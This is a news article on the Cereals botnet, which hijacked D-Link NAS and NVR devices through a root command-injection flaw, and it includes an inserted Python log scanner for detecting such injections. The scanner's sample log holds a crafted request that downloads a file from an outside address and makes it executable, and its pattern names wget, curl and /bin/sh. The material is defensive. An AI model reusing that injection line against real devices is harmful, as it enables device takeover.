A hacker ran a botnet on D-Link NAS and NVR devices for eight years, and used the hijacked devices for nothing more than downloading anime videos.
According to a recent report, the attacker repeatedly compromised NVRs (network video recorders) and NAS (network-attached storage) devices made by D-Link. Investigators found that the botnet was used purely to download anime videos.
The man behind the attack
Reports identify the attacker only as Stefan, a German national. Beyond the name and nationality, no further details about him were available.
The researchers who investigated the case named the botnet Cereals. It operated for years without being detected and treated as a threat.
Cereals began its attacks in 2012 and reached its peak in 2015. Three years after it started operating, the botnet caught the attention of the cybersecurity world when it accumulated 10,000 bots.
How the hacker launched the botnet attack
Cereals scanned for exposed D-Link NAS and NVR devices and, wherever it found a vulnerable one, installed its malware.
Cereals exploited a vulnerability in the devices' built-in web server: by sending crafted HTTP requests, the attacker could execute commands on the device with root privileges.
Experts classify Cereals as an advanced botnet: it installed and maintained four separate backdoor mechanisms on each infected device.
Besides keeping multiple routes into its infected devices, Cereals locked other attackers out by patching the devices and closing the remaining entry points.
The botnet was organised into twelve smaller subnets, through which Cereals managed its infected bots. Experts find it unusual that, despite this sophistication, Cereals exploited only a single vulnerability, since a botnet with these characteristics had the potential to expand well beyond D-Link devices.
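The request type described above is a command injection: a query parameter that the device's web server hands to a shell. The page does not name the vulnerable handler or the exact payload, so the following is an added example rather than code from the Forcepoint report or from D-Link. It scans constructed web-server access-log lines for parameters carrying shell syntax, including double-encoded payloads; the endpoint /cgi-bin/notify.cgi and the IP addresses are hypothetical.

```python
"""Flag HTTP requests to a NAS/NVR web interface whose query parameters carry
shell command-injection payloads.

Added example, not code from the Forcepoint report or from D-Link: the log
lines below are constructed, and /cgi-bin/notify.cgi is a hypothetical
endpoint, not the real vulnerable handler."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Shell syntax and downloader commands typical of command injection against
# embedded Linux devices (the page says Cereals ran commands as root via HTTP).
SHELL_PATTERN = re.compile(
    r"(;|\|\||\||&&|`|\$\(|\bwget\b|\bcurl\b|/bin/sh|\btelnetd\b|\bchmod\b)"
)

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Split one access-log line into fields, plus the decoded query parameters."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["params"] = parse_qsl(url.query, keep_blank_values=True)
    return rec


def injected_params(rec):
    """Return (name, decoded_value) pairs whose value contains shell syntax."""
    hits = []
    for name, value in rec["params"]:
        # parse_qsl already decoded once; a second pass catches double-encoded
        # payloads such as %2524(id) -> %24(id) -> $(id).
        decoded = unquote(value)
        if SHELL_PATTERN.search(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines):
    """Return one finding per request that carries an injection payload."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = injected_params(rec)
        if hits:
            findings.append({"ip": rec["ip"], "path": rec["path"], "hits": hits})
    return findings


# Constructed sample log (documentation IP ranges, hypothetical endpoints).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2015:04:11:09 +0000] "GET /cgi-bin/status.cgi?page=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Mar/2015:04:11:10 +0000] "GET /cgi-bin/notify.cgi?msg=hi%3Bwget%20http%3A%2F%2F198.51.100.5%2Fx%20-O%20%2Ftmp%2Fx%3Bchmod%20%2Bx%20%2Ftmp%2Fx HTTP/1.1" 200 0',
    '198.51.100.22 - - [12/Mar/2015:04:12:01 +0000] "POST /cgi-bin/login.cgi?user=admin HTTP/1.1" 401 128',
    '203.0.113.7 - - [12/Mar/2015:04:12:03 +0000] "GET /cgi-bin/notify.cgi?msg=%2524(id) HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["path"], f["hits"])
```

On the sample log the script reports two requests from 203.0.113.7: one that chains a download and chmod after a `;`, and one whose `$(id)` only appears after a second round of URL decoding. A single-pass decoder would miss the second, which is why the check decodes again after parse_qsl. The pattern list is deliberately broad and will produce false positives on legitimate parameters that contain a pipe or semicolon; in practice you would scope it to the handlers that are known to reach a shell.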
Cereals could also read the sensitive user data stored on the D-Link NAS and NVR devices, and it had the capability to launch DDoS attacks, which it never used.
These capabilities, set against the fact that the botnet was used only to download anime videos, led the researchers to conclude that Cereals was purely a hobby project.
Cereals has since been in slow decline. In the winter of 2019 the Cr1ptT0r ransomware began wiping the Cereals malware from infected D-Link devices.
Cereals botnet status
Owners are gradually retiring the D-Link devices that served as Cereals' hosts, and the ageing platform itself is contributing to the botnet's decline.
Forcepoint, the research team that investigated Cereals, recently released a report on the botnet's exploitation of these devices. The report's publication may also help defenders mitigate similar botnet attacks by other actors.
Image courtesy of Alan Isherwood/Flickr